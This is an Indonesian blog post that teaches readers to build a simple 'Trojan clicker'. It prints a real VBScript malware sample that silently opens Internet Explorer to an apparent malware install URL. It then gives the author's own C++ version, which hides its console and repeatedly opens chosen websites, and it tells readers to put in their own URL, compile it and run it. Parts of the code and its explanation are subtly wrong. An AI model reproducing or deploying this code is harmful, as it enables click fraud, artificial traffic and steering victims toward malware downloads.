.: Dee Personal Blog :.

Subtitle

Blog

Membuat Trojan Clicker Sederhana

Posted by Root on October 25, 2011 at 4:25 AM

Apa itu Trojan Clicker? Mungkin yang terlintas dibenak pembaca tentang Trojan Clicker adalah Trojan yang bisa menggerakan kursor mouse dan membuka sebuah Website dan mengclick iklan, Tapi kenyataanya adalah Trojan-Clicker itu merupakan jenis Trojan yang tetap tinggal di Sistem Memori (Memory Resident) dan terus menerus atau secara teratur mencoba untuk membuka ke URL atau Website tertentu.


Hal ini dilakukan untuk mengembangkan jumlah pengunjung bagi Website tertentu. Tujuan dari Trojan Clicker biasanya untuk mendapatkan uang atau untuk menaikkan Traffic Situs tertentu, bisa juga untuk menjebak korban agar masuk ke URL berbahaya dan mendownload Malware lain.


Ide dari konsep Trojan Clicker sederhana ini, bermula ketika penulis menemukan sebuah VBScript Trojan Clicker dengana nama alias VBS/TrojanClicker.Agent.E, dimana Trojan Clicker tersebut ditulis dengan sangat sederhana dan mudah untuk dipelajari. Berikut isi script dari VBS/TrojanClicker.Agent.E yang memanfaatkan Internet Explorer untuk menjalankan aksinya.


set ie = WScript.CreateObject("InternetExplorer.Application")

ie.Visible=true

ie.Navigate("http://piratas-numericos.info/handlers/install.php?mid=2&aid=46")

ie.Visible=false

while (ie.Busy)

WScript.Sleep(2000)

wend

ie.Quit()


Saat dieksekusi Trojan akan membuka Internet Explorer dan mengarahkannya ke URL http://piratas-numericos.info/handlers/install.php?mid=2&aid=46. Oke sekarang kita akan bandingkan dengan Versi C++ yang penulis buat :


#include

using namespace std;

int main(int argc, char *argv[])

{

FreeConsole();

{

int i;

for(i=1; i < 72000; i++)

{

Sleep(60*1000);

system("rundll32.exe url.dll,FileProtocolHandler http://duniasantai.com/");

ShellExecute(NULL,"open","http:\\google.com",argv[1],NULL,SW_SHOW);

}

return 0;

}

}

Sama simplenya seperti yang Versi VBScriptnya kan? Baik, penulis akan jelaskan sedikit, pada Trojan Clicker ini penulis menggunakan library windows.h untuk mengakses environment milik Windows seperti FreeConsole() yang memiliki arti berjalan di background. Penulis juga merekursif sampai 72000 kali yang artinya jika variabel i = 1 mewakili 1 detik maka Trojan ini akan aktif sampai dengan 72000 detik. Selain itu penulis mengatur timernya 60*1000, 1000 artinya = 1 detik dan 60 artinya 60 detik, nah ini berarti setiap 60 detik sekali akan membuka website http://duniasantai.com dan http://google.com.

Sekarang silahkan ubah URL koding di atas dan compile lah menggunakan Dev-C++ . Penulis anggap proses kompilasi berhasil, silahkan pembaca eksekusi Trojan yang sudah di kompilasi tersebut. Sebelum mengakhiri tutorial ini, perlu diketahui oleh pembaca bahwa Trojan tidak sama dengan Virus atau Worm, jikalau Virus atau Worm dapat menyebar atau mereplika dirinya sedangkan Trojan tidak dapat melakukannya.


Trojan berbeda dengan virus-virus komputer lain, tidak mereplikasi dirinya seperti worm yang merusak sistem komputer, dan bersifat stealth (tidak terlihat). Trojan dikendalikan dari komputer lain yang menyusupkan kode-kode yang merusak kedalam sebuah aplikasi, dan dari kebanyakan kasus karena mengunduh aplikasi dari sumber yang tidak dapat dipercayai. Sumber : http://dennysomad.blog.binusian.org/2011/01/19/tentang-virus-trojan/

 


Categories: Malware Discussions, Programming

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

Already a member? Sign In

0 Comments